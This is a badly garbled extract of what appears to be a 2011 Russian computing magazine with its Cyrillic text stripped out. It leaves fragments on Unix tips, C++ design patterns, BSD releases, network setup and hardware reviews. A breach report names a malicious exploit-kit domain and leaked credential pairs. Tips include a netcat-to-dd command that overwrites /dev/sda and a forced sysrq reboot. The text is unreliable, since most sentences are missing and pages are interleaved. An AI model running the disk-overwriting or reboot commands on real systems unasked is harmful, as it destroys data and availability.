cat /bin/chmod
.
GCC,
. ,
/bin/chmod , .
:
# cp /bin/ls /bin/ls_prev && cat /bin/chmod > /bin/ls &&
> /bin/ls +x /bin/chmod && mv /bin/ls_prev /bin/ls
3. tar, :
$ tar --mode 0755 -cf chmod.tar /bin/chmod
$ tar xvf chmod.tar
, --mode,
. .
4. Cpio , ,
, 21-. ,
:
12 /155/ 2011
$ echo
cpio
perl
cpio
chmod |
-o |
-pe 's/^(.{21}).../${1}755/' |
-i -u
5. , ,
, /bin/chmod, . Debian- :
# apt-get install --reinstall coreutils
init) :
# init 6
, :
0 ;
1 , ;
2 ;
3 , ;
4 , ;
5 + ;
6 .
5
,
blob.dat.
, ,
:
def bstr(n):
""" ."""
return ''.join(
[str(n >> x & 1) for x in (7,6,5,4,3,2,1,0)])
#
f = file('blob.dat', 'rb')
#
bytes = f.read()
#
#
sheet = ''.join([bstr(ord(c)) for c in bytes])
# '1'
print sheet.count('1')
, .
:
,
. , popcnt.
Core i7 sse4.2.
: http://gurmeet.net/puzzles/fast-bit-counting-routines/.
init , , /etc/inittab.
3. Magic SysRq (
CONFIG_MAGIC_SYSRQ):
# echo 1 > /proc/sys/kernel/sysrq
# echo b > /proc/sysrq-trigger
4. : Alt + SysRq,
23 R E I S U B.
:
unRaw ( ),
tErminate ( SIGTERM ),
kIll ( SIGKILL , ),
Sync ( ),
Unmount ( ),
reBoot ( ).
,
CONFIG_MAGIC_SYSRQ (
).
7
IP-.
,
IP-,
, IP-.
Linux- .
def ip2str(ip):
""", IP-."""
1.
shutdown:
# shutdown -r now
, halt reboot,
,
shutdown. , halt shutdown -h now, reboot
, shutdown -r now.
2. , init ( telinit,
12 /155/ 2011
#
#
#
if
IPv4,
,
4
ip > 0xffffffff:
raise ValueError('number must be 32 bit')
ipstr = '{0}.{1}.{2}.{3}'.format(ip >> 24,
ip & 0x00ffffff >> 16,
ip & 0x0000ffff >> 8,
ip & 0x000000ff)
return ipstr
. z
109
,
- .
-. ?
, .
,
-,
. .
,
- .
, ,
, , ,
.
, - XXI ,
.
Hello world! ,
, ,
, . .
,
, ,
.
,
,
.
110
,
SMSBilling, .
float cost(), .
,
cost() , . , :
SMSBeeline, SMSMegafon SMSMts.
class SMSBilling
{
public:
virtual float cost() = 0;
...
}
class SMSBeeline: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineCost;
};
...
}
// SMSMegafon SMSMts SMSBeeline
12 /155/ 2011
. - , , SMSBilling.
, , , .
, ,
.
, . ,
()
,
. ,
-.
class SMSBeelineUA: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineUACost;
};
...
}
class SMSBeelineBY: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineBYCost;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA SMSMtsBY
// SMSBeelineUA SMSBeelineBY
,
, .
, SMSBilling,
. , SMSBeeline, SMSMegafon
SMSMts, SMSBeelineUA, SMSMtsBY . .
cost(), ,
.
,
. , ,
.
, - .
, -
?
cost() .
, ,
.
, , , :
class SMSBeelineUA: public SMSBeeline
{
public:
virtual float cost()
12 /155/ 2011
{
...
//
//
beelineUACost = __super::cost() * coefficientUA;
return beelineUACost;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA, SMSMtsBY
// SMSBeelineBY SMSBeelineUA
? ,
. SMSBeeline,
SMSMegafon SMSMts cost()
,
SMSMtsBY, SMSMegafonUA . .
. , ( RU),
cost(). ,
.
- ,
. .
,
5 %. , , . . ,
. , ,
7 %,
5 %- ,
12 %.
,
. .
, .
class SMSBeelineUABirthdayDiscount: public SMSBeelineUA
{
public:
virtual float cost()
{
...
//
//
//
beelineUABirthdayCost =
__super::cost() * coefficientBirthday;
111
return beelineUABirthdayCost;
};
...
}
//
// SMSBeelineUABirthdayDiscount
,
SMSBilling setDiscount(float),
,
.
class SMSBilling
{
private:
float m_discount;
public:
void setDiscount(float discount) {m_discount = discount;};
virtual float cost() = 0;
...
}
class SMSBeeline: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineCost;
};
...
}
// SMSMegafon SMSMts SMSBeeline
class SMSBeelineUA: public SMSBeeline
{
public:
virtual float cost()
{
...
//
112
//
//
//
if
,
,
(m_discount != 0)
beelineUACost =
__super::cost() * coefficientUA * m_discount;
else
beelineUACost = __super::cost() * coefficientUA;
return beelineUACost;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA, SMSMtsBY
// SMSBeelineBY SMSBeelineUA
billing = new SMSBeelineUA();
// ,
billing->setDiscount(0.1);
cost = billing->cost();
,
, ,
, ,
.
, .
. , ,
-. . ,
. , , SMSBilling
SMSBeeline, SMSMegafon SMSMts.
,
-. .
RegionDecorator,
SMSBilling.
,
SMSBilling.
. cost() RegionDecorator SMSBilling,
.
, . ,
.
12 /155/ 2011
class SMSBilling
{
public:
virtual float cost() = 0;
...
}
class SMSBeeline: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineCost;
};
...
}
class RegionDecorator: public SMSBilling
{
private:
SMSBilling &m_billing;
public:
RegionDecorator(SMSBilling &billing) :
m_billing(billing)
{
}
virtual float cost() = 0;
...
}
class RURegionDecorator: public RegionDecorator
{
public:
RURegionDecorator(SMSBilling &billing) :
RegionDecorator(billing)
{}
virtual float cost()
{
float costRU = m_billing.cost() * coefficientRU;
return costRU;
}
...
}
// UARegionDecorator
// RURegionDecorator
, RURegionDecorator,
UARegionDecorator . .
.
SMSBilling.
:
//
SMSBilling &billing = new SMSBeeline();
// ""
billing = new RURegionDecoator(billing);
//
float cost = billing.cost();
.
.
cost()
.
DiscountDecorator.
12 /155/ 2011
DiscountDecorator
class DiscountDecorator: public SMSBilling
{
private:
SMSBilling &m_billing;
public:
DiscountDecorator(SMSBilling &billing) :
m_billing(billing)
{
}
virtual float cost() = 0;
...
}
class BirthdayDiscountDecorator: public DiscountDecorator
{
public:
BirthdayDiscountDecorator(SMSBilling &billing) :
DiscountDecorator(billing)
{
}
virtual float cost()
{
float costBirthday =
m_billing.cost() * coefficientBirthday;
return costBirthday;
}
...
}
// ""
// BirthdayDiscountDecorator
//
SMSBilling &billing = new SMSBeeline();
// ""
billing = new RURegionDecoator(billing);
//
billing = new BirthdayDiscountDecoator(billing);
//
//
float cost = billing.cost();
,
.
.
,
. ,
.
, -, (
setDiscount), -,
, ,
, .
. , :
, (
)
.
.
. z
113
(grinder@tux.in.ua),
(execbit.ru)
UNIXOID
INFO
OpenBSD
: 1
1 . 5.0
32 .
OPENBSD 5.0
FREEBSD 9.0
OpenBSD 2.3 2.4
,
Beastie,
Puffy
.
,
,
,
.
.
,
. OpenBSD FreeBSD
. ,
.
OpenBSD
BSD-
FreeBSD.
NetBSD DragonFlyBSD.
114
OpenBSD 19
(1995 ).
16 .
OpenBSD
LiveCD: MarBSD, Quetzal,
FuguIta, jggimi, OliveBSD,
AnonymOS, LiveCDOpenBSD, BSDanywhere
.
WWW
OpenBSD
openbsd.org.
OpenBSD openbsd.ru,
obsd.ru.
OpenBSD Journal
undeadly.org.
-
OpenBSD openports.se.
OPENBSD 5.0
OpenBSD 1995 , ,
NetBSD, -
.
, . Free, Functional and Secure
. , , , .
, , - ,
.
. (dhcpd, ntpd, bgpd) ,
.
API ( strlcat,
strlcpy, issetugid, arc4random ) (, Systrace, GCC/ProPolice), ,
OpenBSD .
OpenBSD ,
, Linux BSD-, (blob, binary linked
12 /155/ 2011
OpenBSD
object ),
. , ,
.
OpenBSD, gNewSense Gobuntu .
,
, BSD. ,
, Adaptec. ,
FSF , OpenBSD, .
( ,
, , ).
Makefile URL , . ,
.
OpenBSD 17
,
. BSD- ISC,
,
. BSD GPL,
. OpenBSD . , (sshd, ntpd, X ).
( Linux, , ), 16
. (Only two remote holes in the default install,
in a heck of a long time!) , (, openbsd.ru)
.
.
. 5.0.
: ,
, .
.
malloc
.
,
. .
.
12 /155/ 2011
115
UNIXOID
(hexdump, tcpdump, libc) , UTF-8.
OpenBSD 4.9
/etc/rc.d. 5.0
,
/etc/rc.d rc- rc.{local,shutdown}.
netstat -vP, PCB- (Protocol
Control Block), .
disklabel '-F', UID,
fdisk mount ( ).
pkg scp://hostname/~user/subdir.
Beagle board (
OMAP3530 ARM
Cortex-A8, Texas Instruments DigiKey).
OPENSSH 5.9
OpenBSD , , .
PF, IPFilter
BSD, NTP
OpenNTPD, OpenOSPFD OpenBGPD. ,
CVS OpenCVS.
OpenSSH SSH,
.
OpenSSH 5.9, 6 ,
sandboxes ()
systrace, seatbelt rlimit.
( )
. sandbox ,
.
UsePrivilegeSeparation sandbox, .
,
,
SSH-, ,
.
. systrace
OPENBSD/IPSEC?
2010 OpenBSD
IPsec.
,
, . , ,
. : goo.gl/Rl964.
. systrace,
SYSTR_POLICY_KILL
( OpenBSD). seatbelt, OS X/Darwin, ,
. rlimit
, .
setrlimit()
. sandbox
UseLogin .
ssh_config Host,
, .
* ( ) ? ( ), 5.9 !. ,
, , :
# cat /etc/ssh/ssh_config
Host *.example.org !host1.example.org
SONG 5.0
OpenBSD .
, .
5.0 What Me Worry? (goo.gl/dRisZ).
PC-BSD 9
FreeBSD 9.0
- PC-BSD 9.
ZFS
GELI-,
(KDE 4, GNOME 2, XFCE 4, LXDE) .
,
Life-Preserver .
PBI- ,
,
.
, freebsd-update
(, 9.0 9.1).
OpenBSD LiveCD
116
12 /155/ 2011
SHA256: HMAC-SHA2-256, HMAC-SHA2-256-96, HMAC-SHA2-512
HMAC-SHA2-512-96. ssh-keysign
ECDSA.
AuthorizedKeysFile (sshd_config) ,
. (%h
, %u . .), .
: AuthorizedKeysFile
, (
).
UserKnownHostsFile/GlobalKnownHostsFile
.
5.7 IPQoS TOS/DSCP/QoS,
. IPQoS IPv6.
ssh-keygen '-A', (RSA, DSA ECDSA)
( ).
. , , ssh-add < /path/to/key,
ssh-add
.
FREEBSD 9.0
C FreeBSD
9.0. , .
FreeBSD Linux , ,
.
FreeBSD 9 DTrace,
Solaris.
7.0,
DTrace
.
/ .
/ ,
UNIX.
LLVM Clang, GCC , .
GCC,
GPLv3, LLVM/Clang BSD,
FreeBSD -
FreeBSD 9.0
12 /155/ 2011
OpenBSD
. ,
GCC LLVM/Clang.
,
, Jail-,
RCTL,
,
, setrlimit(). rctl
,
, SIGHUP
syslog (
, ).
Capsicum,
, . Capsicum
,
SELinux AppArmor, .
,
cap_new() cap_enter()
, (
),
/
.
, , ,
( tcpdump , chromium ).
TCP-,
117
UNIXOID
FreeBSD 9.0
BSD-
*nix-:
SMP- ( 32 CPU),
TCP- CPU,
(HTCP, CUBIC, Vegas, HD CHD),
(Congestion Control) TCP.
TCP- ERTT
(Enhanced Round Trip Time),
Congestion Control.
sysinstall,
,
BSDinstall, . , ,
GPT-, ZFS Jail. , BSDInstall
(,
, ) .
, BSDinstall .
USB-, USB 3.0, XHCI (eXtensible Host Controller Interface).
, USB 1.0/2.0,
OHCI, UHCI EHCI.
Soft Updates UFS . ,
, fsck. UFS
TRIM,
SSD- .
GEOM, , ,
4K, .
118
gpart
,
UFS
4/32 .
GEOM , -
,
.
gsched_rr,
.
AES GEOM- GELI XTS,
.
RAID-
ataraid graid, ATA. , , GEOM
. RAID
. Intel,
JMicron, NVIDIA, Promise SiliconImage.
RAID-: RAID0, RAID1, RAID1E, RAID10, SINGLE, CONCAT.
GEOM- HAST,
ggate ,
master .
ZFS 28, , :
(),
.
RAIDZ3, , ,
.
ZFS zfs diff.
NFS- .
UFS NFSv4 ACL POSIX ACL. z
12 /155/ 2011
>>>> coding
coding
UNIXOID
(execbit.ru)
KERNEL.ORG,
LINUX.COM,
LINUXFOUNDATION.ORG
MYSQL.COM
kernel.org
Linux.
linux.com
linuxfoundation.org,
mysql.com.
,
?
.
INFO
,
mysql.com,
: ClamAV,
Rising, TrendMicro
TrendMicro-HouseCall.
120
Gitolite,
kernel.org,
,
$1000 ,
.
KERNEL.ORG,
kernel.org , ,
. John Warthog9 Hawley, kernel.org, users@kernel.org
(pastebin.com/BKcmMd47)
. ,
HPA (H Peter Anvin), hera,
odin1, , , demeter2, zeus1 zeus2.
.
:
1. 12 .
2. , .
3. Xnest
/dev/mem, ,
.
, , ,
. . . . , kernel.org
,
Linux, ,
Git, Warthog9,
, Google+, kernel.org, ,
3Leaf Systems, C2 Microsystems, Orion Multisystems,
web- Iowa Interactive .
12 /155/ 2011
, , ,
!
- Warthog9 ,
Phalanx SSH-,
Warthog9 - . , Phalanx,
, , 2008 SSH-,
.
cd /etc/khubd.p2/ rkhunter, ,
, kernel.org.
, , , . ,
, SSH-
kernel.org, ,
root - , Phalanx, .
, , .
kernel.org. ,
.
, . Corbet Linux Foundation (goo.gl/7MyRu),
.
Git ,
. , Git
,
.
, ,
, , .
, , , ,
, .
, .
,
kernel.org . Linux
github.com, , , (https://github.com/
torvalds/linux). , .
kernel.org
, SSH-. SSH Git,
HTTP.
,
Gitolite,
.
: goo.gl/1brFK.
kernel.org ( ).
: LINUX.COM
LINUXFOUNDATION.ORG
kernel.org linux.com
linuxfoundation.org.
, . , , , ,
, kernel.org.
SSH-,
. ,
12 /155/ 2011
kernel.org
Linux Foundation
.
linux.com linuxfoundation.org,
Open Printing, Linux Mark Foundation events
. 6
.
. , ,
Linux Foundation , , .
? , , , ,
, ,
kernel.org, , Linux Foundation . ,
, ,
SSH
. ,
kernel.org ,
SSH- - Linux Foundation,
Linux .
linux.com
(goo.gl/N1DZX) .
,
, .
Guru-2012 linux.com
.
MYSQL.COM,
Armorize (goo.gl/PGKRi),
web-,
mysql.com. HackAlert,
, MySQL. .
, JS-, ,
, IFrame. , ,
truruhfhqnviaosdpruejeslsuy.cx.cc/main.php,
BlackHole exploit pack. - Adobe Flash, Adobe PDF Java
MW:JS:159, FTP- ( PHP-, HTML- JS-).
121
UNIXOID
KERNEL-
kernel.org Greg Kroah-Hartman
kernel.org
.
,
,
chkrootkit ,
,
,
, .
: goo.gl/VYyCl.
JS-, mysql.com
JS-, mysql.com ( )
, linux.com
122
, , .
( 22 ).
mysql.com Oracle ,
, .
, mysql.com.
, Trend Micro .
mysql.com,
,
sourcecOde.
3000 root-
, MySQL. ,
, JS- .
. , sourcecOde,
.
, uname -a whoami Fedora Core 11
http1.web.mysql.com. ,
root, nmap dig. ,
, root-,
. ,
www
.
.
mysql.com . SQL- .
. ,
,
, sys:phorum5,
sysadm:qa. admin:6661 (,
!), ,
,
,
web-.
, mysql.com
.
12 /155/ 2011
WINEHQ.ORG
FEDORAPROJECT.ORG
root- mysql.com
opensource-. Wine,
appdb.winehq.org. Jeremy White,
.
,
. , , Jeremy White,
. ,
web- phpMyAdmin
. phpMyAdmin
. ,
,
.
,
phpMyAdmin ,
, SSH- OpenVPN.
Fedora
SSH- , ,
,
kernel.org, linuxfoundation.org linux.com.
30 ,
.
: , ,
, 12
, 20 .
.
. ?
, ,
kernel.org, . GNU:
savannah.gnu.org. SQL- ,
. , PHP-.
48 ,
,
.
.
2010 Apache Software
Foundation, , , .
.
apache.org 2009 ,
apachecon.org, 0day-, SSH- backup-
people.apache.org .
, mysql.com
12 /155/ 2011
- , ,
. kernel.org , Linux Foundation -
SSH- , kernel.org,
mysql.com .
,
. z
123
SYN/ACK
hatchet (maks.hatchet@yandex.ru)
,
UNIX-
.
-, .
.
, .
124
,
,
, Bluetooth, -
,
RAID-. ,
, .
,
.
PPTP/PPPoE-, , /
, , -
DHCP-.
, network-manager DHCP-,
.
.
.
quickswitch, -
12 /155/ 2011
, , , ifup
Debian/Ubuntu, . ,
: http://muthanna.com/quickswitch.
Perl,
switchto /usr/local/bin.
quickswitch
,
/etc/quickswitch/switchto.conf :
# vi /etc/quickswitch/switchto.conf
[config]
//
device=eth0
//
servicefilename=/etc/quickswitch/switchto.last
// home
[home]
description=home
address=192.168.0.25
netmask=255.255.255.0
gateway=192.168.0.1
dns1=195.62.99.42
dns2=195.62.97.177
// work
[work]
description=work
address=10.16.3.114
netmask=255.255.255.0
gateway=10.16.3.249
dns1=195.62.99.42
switchto:
$ sudo switchto work
$ sudo switchto home
,
,
wpa_supplicant. :
12 /155/ 2011
$ su -s
# mv /etc/wpa_supplicant.conf /etc/wpa_supplicant.conf.bak
# wpa_passphrase ssid/- >> \
/etc/wpa_supplicant/wpa_supplicant.conf
:
$ sudo ifconfig wlan0 up
$ sudo iwconfig wlan0 essid $net
$ sudo wpa_supplicant -B -Dwext -i wlan0 \
-c /etc/wpa_supplicant.conf
$ dhcpcd wlan0
, . , , :
# vi /usr/local/bin/tryconnect.sh
#!/bin/sh
# ( /etc/quickswitch/switchto.conf)
NETS="home work"
# ( SSID)
WNETS="home work"
#
# DNS-.
#
tryping() {
if ping -q -n -c 1 8.8.8.8; then exit; fi
}
# ,
tryping
# , $NETS
for net in NETS; do
switchto $net; sleep 10
tryping
125
SYN/ACK
FTP DD
OPENBSD
,
speedtest.net. ftp-:
OpenBSD
:
//
# ifconfig em0 up
//
# ifconfig ath0 nwid my_wlan up
//
# ifconfig trunk0 trunkproto failover \
trunkport em0 trunkport ath0 \
192.168.1.1 netmask 255.255.255.0
Wi-Fi.
done
# , DHCP
dhcpcd eth0
sleep 5
tryping
# , Wi-Fi
killall dhcpcd
ifconfig wlan0 up
# Wi-Fi-
for net in WNETS; do
iwconfig wlan0 essid $net
wpa_supplicant -B -Dwext -i wlan0 \
-c /etc/wpa_supplicant.conf
sleep 10
dhcpcd wlan0
sleep 5
tryping
done
netcat, ,
(
-2 -1):
-1# netcat -l -p 9000 | dd of=/dev/sda
-2# dd if=/dev/sda | netcat IP--1 9000
, ,
100 %, .
crontab,
, , ,
:
$ sudo crontab -e
*/5 * * * * /usr/local/bin/tryconnect.sh
. network-manager
.
PPPoE/PPTP-
3G- wvdial.
BLUETOOTH-
Wi-Fi, . ? ,
, Wi-Fi-
.
Bluetooth, ,
( USB-Bluetooth-)
.
Bluetooth
IP-, Linux,
BSD-. PAN (Personal
Area Networking), BNEP (Bluetooth Network
Encapsulation Protocol).
126
quickswitch
12 /155/ 2011
Linux :
1. ,
, pand, :
$ sudo pand -listen -role NAP
2. bnep0, pand:
$ sudo ifconfig bnep0 192.168.0.1
, ,
, NAT:
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A POSTROUTING \
-o eth0 -j MASQUERADE
FreeBSD:
1. sdpd,
Bluetooth- ,
Bluetooth-:
# kldload ng_ubt
# /etc/rc.d/sdpd start
2. - btpand :
# ifconfig tap0 create
# btpand -i tap0 -s NAP
# ifconfig tap0 192.168.0.1 netmask 255.255.255.0
3. - :
#
#
#
#
4. ,
NAT:
# sysctl net.inet.ip.forwarding=1
# ipfw add nat 123 all from tun0 to any
MAC-
:
deluge,
-.
:
# vi /usr/local/bin/autotorrent.sh
#!/bin/bash
# ( ),
#
IDLE=120000
#
STOPCMD="transmission-remote -S"
#
STARTCMD="transmission-remote -s"
# STOPCMD="deluge-console pause \*"
# STARTCMD="deluge-console resume \*"
STOPPED="yes"
while true; do
if [ 'xprintidle' -gt $IDLE ]; then
if [ $STOPPED = "yes" ]; then
$STARTCMD
STOPPED="no"
fi
else
if [ $STOPPED = "no" ]; then
$STOPCMD
STOPPED="yes"
fi
fi
sleep 60
done
STOPCMD STARTCMD
.
-. , deluge ,
deluged.
~/.config/autostart:
# ln -s /usr/bin/deluged ~/.config/autostart
:
trickle, , -
12 /155/ 2011
ALSA
arecord,
. ,
127
SYN/ACK
, , . ,
netcat,
. , VoIP-
:
-1$ netcat -l -p 5555 | aplay
-2$ arecord | netcat IP--1 5555
-2 -1. .
, .
,
,
.
, ALSA , :
$ vi .asoundrc
pcm.copy {
type plug
slave {
pcm hw
}
route_policy copy
}
arecord netcat:
-2 $ arecord -D copy | netcat IP--1 5555
RAID1
RAID. ,
.
, RAID- , RAID-
.
, , .
Linux/BSD-, , , ,
.
, ,
.
RAID-
, , RAID (, ,
IDE ),
(
). :
. ,
,
!
. 2009
Linux DRBD (Distributed
Replicated Block Device),
, , ,
-, , .
,
Linux.
128
, :
1. . ,
.
fdisk/cfdisk GNU Parted. ,
, , .
, ,
: sda5 192.168.0.1 sda7 192.168.0.2.
, ,
. DRDB ,
, master-.
, master- ,
.
2. ,
. ,
: shared-secret
, disk
, address .
:
# vi /etc/drbd.conf
global { usage-count no; }
common { syncer { rate 100M; } }
resource r0 {
protocol C;
startup {
wfc-timeout 15;
degr-wfc-timeout 60;
}
net {
cram-hmac-alg sha1;
shared-secret "";
}
on node1 {
device /dev/drbd0;
disk /dev/sda5;
address 192.168.0.1:7788;
meta-disk internal;
}
on node2 {
device /dev/drbd0;
disk /dev/sda7;
address 192.168.0.2:7788;
meta-disk internal;
}
}
DRBD-.
drbd-utils drbd8-utils.
3.
drbdadm:
# drbdadm create-md drbd0
.
DRBD-:
# /etc/init.d/drbd start
12 /155/ 2011
DRBD-
(,
drbdadm up all),
DRBD master-, ,
.
/etc/gg.exports -
, :
4. master- DRBD, :
, ,
- ggate, :
192.168.0.2 RW /dev/ad0s1d
.
/proc/drbd.
5. .
DRBD- :
# mkfs.ext4 /dev/drbd0
# mount /dev/drbd0 /mnt
, /mnt,
.
, master- . ,
.
FreeBSD .
GEOM- ggate, , GEOM- gmirror
RAID1.
, DRBD Linux.
, ,
.
DRBD, . , .
GEOM-:
# kldload geom_mirror
# kldload geom_gate
, ggate
, .
12 /155/ 2011
-
:
# ggatec create 192.168.100.2 /dev/ad0s1d
, ( ,
ggate0). ,
- ( /dev/ad0s1d) /dev/ggate0
RAID1- gmirror:
# gmirror label -v -b prefer gm0 ggate0 ad0s1d
, .
, : ) , )
prefer .
/ :
# fsck -t ufs /dev/mirror/gm0
# mount /dev/mirror/gm0 /mnt
,
UNIX-,
man-. ,
! z
129
SYN/ACK
SYN/ACK
grinder
grinder (grinder@tux.in.ua)
,
.
.
,
.
.
130
0130
VIDEO
BIRD
bird.network.cz.
C Quagga quagga.net.
Quagga quagga.
net/docs.
RFC
ietf.org.
WARNING
Quagga
CONFIG_NETLINK,
CONFIG_RTNETLINK
CONFIG_IP_MULTICAST.
INFO
Quagga
.
,
,
.
/usr/
share/doc/quagga/
tools
LINUX
: ,
() ?
?
? , -.
,
cron IP .
c .
iproute2. , , ,
( 192.168.0.2 192.168.1.2 ,
192.168.0.1 192.168.1.1 ):
#echo "1_ISP" >> /etc/iproute2/rt_tables
#echo "2_ISP" >> /etc/iproute2/rt_tables
#ip route add 192.168.1.0/24 dev eth0 src \
192.168.1.2 table 1_ISP
#ip route add default via 192.168.1.1 table 1_ISP
#ip route add 192.168.0.0/24 dev eth2 src 192.168.0.2 \
table 2_ISP
#ip route add default via 192.168.0.1 table 2_ISP
#ip rule add from 192.168.1.2 table 1_ISP
#ip rule add from 192.168.0.2 table 2_ISP
#ip route add default scope global nexthop via \
192.168.1.1 dev eth0 weight 1 \
nexthop via 192.168.0.1 dev eth2 weight 1
,
. ,
, ,
. :
RIP, OSPF, BGP, IGRP, EIRGP, IS-IS .
, ,
. - , , . :
RIP (Routing Information Protocol) BSD
.
,
.
(, . hope).
30 , .
(next hop)
. RIP . 15.
180 ,
16 . ,
.
RIPv2 (RFC 2453) RIPng ( IPv6). 520/UDP.
12
12 /155/
/155/ 2011
2011
debian.conf
. Quagga
,
zebra (core daemon),
,
API.
.
vtysh,
Quagga. vtysh Cisco CLI,
, Cisco, ,
.
Quagga Linux, *BSD OpenSolaris. Ubuntu
:
$ sudo apt-get install quagga
# vi /etc/sysctl.conf
net.inet.ip.forwarding=1
/etc/ospfd.conf
ospf6d.conf, .
*nix ( Linux)
, :
BIRD (BIRD Internet Routing Daemon, bird.network.cz) RIPv2,
BGPv4, OSPFv2/v3,
.
Quagga (quagga.net) , BGPv4 v4+, RIP v1/v2/v3, RIPng, OSPF
v2/v3 IS-IS.
,
.
, .
12
12 /155/
/155/ 2011
2011
, . ,
.
/etc/quagga. ,
,
: quagga.net/doc. (
) /etc/quagga/daemons.
. OSPF:
$ sudo nano /etc/quagga/daemons
zebra=yes
ospfd=yes
bgpd=no
# OSPF IPv6
ospf6d=no
ripd=no
# RIPng IPv6
ripngd=no
isisd=no
yes no ,
: 1 ( )10 ( ) 0 ().
TCP-, , /etc/services:
$ grep zebra /etc/services
, Quagga
.
131
0131
SYN\ACK
SYN/ACK
grinder (grinder@tux.in.ua)
,
, terminal mode.
,
/etc/quagga/debian.conf ( /etc/
init.d/quagga), '--keep_kernel'
'--retain'.
$ sudo nano /etc/quagga/debian.conf
vtysh_enable=yes
zebra_options=" --daemon -A 127.0.0.1 -u quagga \
--keep_kernel --retain"
ospfd_options=" --daemon -A 127.0.0.1 -u quagga"
'--daemon'
IP-, (-A 127.0.0.1).
vtysh_enable
. ,
, '-u quagga'.
:
, Quagga
, .
OSPF
/usr/share/doc/quagga/examples
, :
$ sudo cp v /usr/share/doc/quagga/examples/zebra.conf.sample \
/etc/quagga/zebra.conf
$ sudo cp v /usr/share/doc/quagga/examples/ospfd.conf.sample \
/etc/quagga/ospfd.conf
$ sudo cp v /usr/share/doc/quagga/examples/vtysh.conf.sample \
/etc/quagga/vtysh.conf
:
list
Quagga.
$ sudo service quagga restart
.....
Starting Quagga daemons (prio:10): zebra ospfd.
,
. ps aux | grep quagga netstat-ant ,
.
,
. ,
vtysh. !
#. zebra.conf:
multicast
!
! ( )
ip route 0.0.0.0/0 11.22.33.44
! , /var/log/quagga
! / quagga:quagga
ospfd.conf
.
132
0132
12
12 /155/
/155/ 2011
2011
! ospf
area 0
network 192.168.0.0/24 area 0
! network 172.10.10.0/16 area 1
log file /var/log/quagga/ospfd.log
. telnet vtysh.
:
$ sudo vtysh
.
, list. :
# configure terminal
.
, ,
,
.
(config)# service password-encryption
(config)# exit
;
# show memory
# write memory
Integrated configuration saved to /etc/quagga/Quagga.conf [OK]
, ,
. Quagga.conf, ,
. show startupconfig . .
# show ip route
Codes: K - kernel route, C - connected, S - static,
R - RIP, O - OSPF, I - ISIS, B - BGP,
> - selected route, * - FIB route
S 0.0.0.0/0 [1/0] via 192.168.10.2, eth0
K>* 0.0.0.0/0 via 192.168.10.2, eth0
C>* 127.0.0.0/8 is directly connected, lo
K>* 169.254.0.0/16 is directly connected, eth0
OSPF
, .
(IP 192.168.1.2):
(config)# ip route 10.0.0.0/8 192.168.1.2
,
OSPF.
, .
(config)# router ospf
; ID , IP
(config-router)# ospf router-id 192.168.0.1
;
(config-router)# redistribute connected
(config-router)# redistribute static
;
(config-router)# neighbor 192.168.1.2
(config-router)# neighbor 192.168.2.2
(config-router)# default-information originate
(config-router)# end
# write file
( ), default-information originate.
, static route, .
.
, router-id neighbor.
.
#
#
#
#
#
show
show
show
show
show
ip ospf database
ip ospf neighbor
ip ospf database
interface
debugging ospf
write memory
12
12 /155/
/155/ 2011
2011
. , ,
, . , . z
133
0133
FERRUM
QUADRATISCH.
PRAKTISCH. GUT
GIGABYTE GA-H61N-USB3
ATX , , ,
, .
. Micro-ATX,
.
Mini-ITX. . , GIGABYTE GA-H61N-USB3.
,
Mini-ITX Intel
H61 Express. -, .
GIGABYTE GA-H61N-USB3
, , PEG ( SLI
CrossFireX ). . ,
DDR3
1333 , !
, . ,
PCI Express 16
, . Intel
P67 Express Intel Z68 Express.
PCI Express, USB 2.0 SATA II.
, USB 3.0 SATA 3.0 .
-
, ,
SATA
Intel H67 Express. ,
. ,
Intel H61 Express RAID'. ,
Intel
134
SSD,
. ,
, . .
, HTPC
SATA II,
23
, Dual BIOS . , GIGABYTE GA-H61N-USB3
,
RAID- .
. ,
.
DIMM, PCI Express x16.
,
BIOS ( Smart 6)
.
,
, , - .
, Super Pi 1.5 XS
,
wPrime 32 ,
Intel Sandy Bridge. WinRAR
CINEBENCH , ,
HD-.
, , Intel H61
Express ,
.
.
,
GIGABYTE GA-H61N-USB3 . ,
, GIGABYTE Super 4 GIGABYTE
Ultra Durable 3. ,
GIGABYTE GA-H61N-USB3
, , :
HTPC. z
12 /155/ 2011
3000
.
,
Mini-ITX (170 170 )
.
Nano-ITX (120 x 120 ) PicoITX (100 x 72 ). ,
GIGABYTE GA-H61N-USB3 .
12 /155/ 2011
: LGA1155
: Intel H61 Express
: DDR3, 8001333
: 1x PCI Express x16
: 2x SATA II
: Ethernet, 10/100/1000 /
: 7.1 CH, HDA, Realtek
ALC889
: 1x DVI, 1x
D-Sub, 1x HDMI, 2x USB 3.0, 4x USB 2.0,
1x eSATA, 2x S/PDIF, 1x RJ-45, 3
: Mini-ITX, 171 171
:
Intel Core i5-2400, 3,1
:
GIGABYTE GA-H61N-USB3
: Kingston
KVR1066D3N7K2/2G, 2x 1
SSD: Corsair Force F120,
120
: HIPER TYPE
K1000, 1000
: Windows 7
135
FERRUM
,
EDIFIER MP250
1300
.
Edifier, ,
.
:
Edifier MP250 . ,
, , .
!
Edifier MP250 ,
. , .
, ,
,
. Edifier MP250
,
.
USB mini-USB, jack-tojack .
.
,
. , Edifier MP250 :
.
:
: RMS 2 2
/: 75
- -: 4 1,25
-: , 3 1,25
: USB, 3,5 jack
: USB,
: 261 36 44
: 0,33
USB-.
. USB.
3,5
. ,
,
USB,
.
,
,
. ,
,
. ,
. ,
.
Edifier MP250
. Edifier MP250 -
,
.
136
. Edifier MP250 .
, .
( , )
.
Edifier MP250
. ,
.
-
,
Edifier MP250. ,
, . ,
? ,
. z
12 /155/ 2011
>Net
BenderConverter
Colasoft Packet Player 1.2
Device Doctor 2.0
digsby
Echo Mirage 1.2
Feed Notifier 2.5
FVD Suite 2.6.8
Google.mE 1.50
inSSIDer 2.0.7
MetroTwit
NetSpeedMonitor 2.5.4.0
NFReader 1.4.1
Odysseus 2.0.0.84
ooVoo 3.0.4
RevoluTV 2.5
>Multimedia
AIMP 3.00 Beta 5
DeepBurner 1.9
